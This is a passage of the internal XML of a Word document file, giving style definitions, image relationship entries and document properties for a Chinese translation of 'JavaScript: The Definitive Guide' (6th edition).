    <w:name w:val="Para 06"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="67" w:after="67" w:line="384" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para07">
    <w:name w:val="Para 07"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="640" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para08">
    <w:name w:val="Para 08"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="640" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para09">
    <w:name w:val="Para 09"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="640" w:lineRule="atLeast"/>
      <w:ind w:leftChars="100" w:left="100" w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para10">
    <w:name w:val="Para 10"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="640" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体" w:cs="华文楷体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para13">
    <w:name w:val="Para 13"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="640" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para14">
    <w:name w:val="Para 14"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="384" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体" w:cs="华文楷体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para15">
    <w:name w:val="Para 15"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="640" w:lineRule="atLeast"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="华文楷体" w:eastAsia="华文楷体" w:hAnsi="华文楷体" w:cs="华文楷体"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para16">
    <w:name w:val="Para 16"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="720" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para17">
    <w:name w:val="Para 17"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="640" w:lineRule="atLeast"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para18">
    <w:name w:val="Para 18"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="384" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para19">
    <w:name w:val="Para 19"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="960" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para20">
    <w:name w:val="Para 20"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="640" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Para21">
    <w:name w:val="Para 21"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeLines="100" w:afterLines="100" w:line="384" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="microsoftyahei" w:eastAsia="microsoftyahei" w:hAnsi="microsoftyahei" w:cs="microsoftyahei"/>
      <w:color w:val="0468BB"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="0Text">
    <w:name w:val="0 Text"/>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Text">
    <w:name w:val="1 Text"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Text">
    <w:name w:val="2 Text"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Text">
    <w:name w:val="3 Text"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Text">
    <w:name w:val="4 Text"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:vertAlign w:val="subscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5Text">
    <w:name w:val="5 Text"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="6Text">
    <w:name w:val="6 Text"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0Block">
    <w:name w:val="0 Block"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="inset" w:sz="2" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="384" w:lineRule="atLeas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117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.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112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpeg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpeg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpeg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.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image" Target="media/image102.jpeg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpeg"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpeg"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xm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121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.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103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpeg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpeg"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpeg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpeg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpeg"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12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122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.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109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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image" Target="media/image101.jpeg"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.jpeg"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.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29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpeg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpeg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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Template>Normal.dotm</Template>
  <TotalTime>6</TotalTime>
  <Pages>1985</Pages>
  <Words>152104</Words>
  <Characters>866999</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>7224</Lines>
  <Paragraphs>2034</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1017069</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>15.0000</AppVersion>
  <Company/>
</Properties>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <cp:lastModifiedBy>刘欢</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-26T07:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-07-29T11:54:00Z</dcterms:modified>
  <dc:title>JavaScript权威指南（原书第6版）</dc:title>
  <dc:creator>(美)David Flanagan</dc:creator>
  <dc:language>zh</dc:language>
</cp:coreProperties>
</file>